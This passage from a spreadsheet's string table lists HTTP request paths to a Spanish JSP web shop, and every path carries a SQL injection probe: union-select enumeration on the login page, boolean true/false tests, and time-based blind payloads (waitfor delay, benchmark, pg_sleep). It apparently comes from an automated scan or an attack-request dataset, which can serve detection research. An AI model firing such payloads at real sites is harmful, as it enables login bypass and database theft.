    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669,4669--and(("ulmv"like"ulmv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731,731--and(("pozh"like"pozh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008,6008--and(("vpzm"like"vpzm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904,9904--and(("zacw"like"zacw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279--and(("zpsk"like"zpsk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402,3402--and(("odjc"like"odjc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720,8720--and(("ajqf"like"ajqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194,1194--and(("jqlo"like"jqlo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927,9927--and(("vxkm"like"vxkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783--and(("vbcx"like"vbcx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437,9437--and((("jjhd"like"jjhd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529--and((("bctt"like"bctt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262,262--and((("djwt"like"djwt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525--and((("hczd"like"hczd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915--and((("pgzh"like"pgzh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362,9362--and((("xgtb"like"xgtb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698,2698--and((("eqwm"like"eqwm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601,7601--and((("ajnx"like"ajnx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992--and((("pijn"like"pijn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187--and((("drik"like"drik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360,6360--and"djgk"like"djgk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386,3386--and"sunr"like"sunr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654,2654--and"jvqn"like"jvqn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017,8017--and"rcmt"like"rcmt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899,1899--and"bbtg"like"bbtg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926,3926--and"tnug"like"tnug</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228,6228--and"duzj"like"duzj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387--and"oaps"like"oaps</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801,9801--and"rien"like"rien</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368,9368--and"wgxx"like"wgxx</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0"+or+"24"="24</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0"+and+"24"="25</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0'+or+'24'='24</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0'+and+'24'='25</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0+or+24=24+</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0+and+24=25+</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=3"+or+"33"="33</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=3"+and+"33"="34</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=3'+or+'33'='33</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=3'+and+'33'='34</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=3+or+33=33+</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=3+and+33=34+</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja"+or+"6"="6&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja"+and+"6"="7&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja'+or+'6'='6&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja'+and+'6'='7&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1;waitfor+delay+'0:0:5'--&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1);waitfor+delay+'0:0:5'--&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1));waitfor+delay+'0:0:5'--&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1';waitfor+delay+'0:0:5'--&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1');waitfor+delay+'0:0:5'--&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'));waitfor+delay+'0:0:5'--&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1+or+benchmark(2500000,md5(1))&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1+or+pg_sleep(5)&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=1"+or+pg_sleep(5)+or+"1"="1&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85"+or+"16"="16&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85"+and+"16"="17&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85'+or+'16'='16&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85'+and+'16'='17&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85+or+16=16+&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85+and+16=17+&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1;waitfor+delay+'0:0:5'--&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1);waitfor+delay+'0:0:5'--&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1));waitfor+delay+'0:0:5'--&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1';waitfor+delay+'0:0:5'--&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1');waitfor+delay+'0:0:5'--&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1'));waitfor+delay+'0:0:5'--&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1+or+benchmark(2500000,md5(1))&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1+or+pg_sleep(5)&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1'+or+pg_sleep(5)+or+'1'='1&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=1"+or+pg_sleep(5)+or+"1"="1&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3"+or+"35"="35&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3"+and+"35"="36&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3'+or+'35'='35&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3'+and+'35'='36&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3+or+35=35+&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3+and+35=36+&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1;waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1);waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1));waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1';waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1');waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1'));waitfor+delay+'0:0:5'--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1+or+benchmark(2500000,md5(1))&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1+or+pg_sleep(5)&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1'+or+pg_sleep(5)+or+'1'='1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=1"+or+pg_sleep(5)+or+"1"="1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1"+or+"59"="59</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1"+and+"59"="60</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1'+or+'59'='59</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1'+and+'59'='60</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1+or+59=59+</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1+and+59=60+</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=2"+or+"72"="72</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=2"+and+"72"="73</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=2'+or+'72'='72</t>
  </si>
  <si>
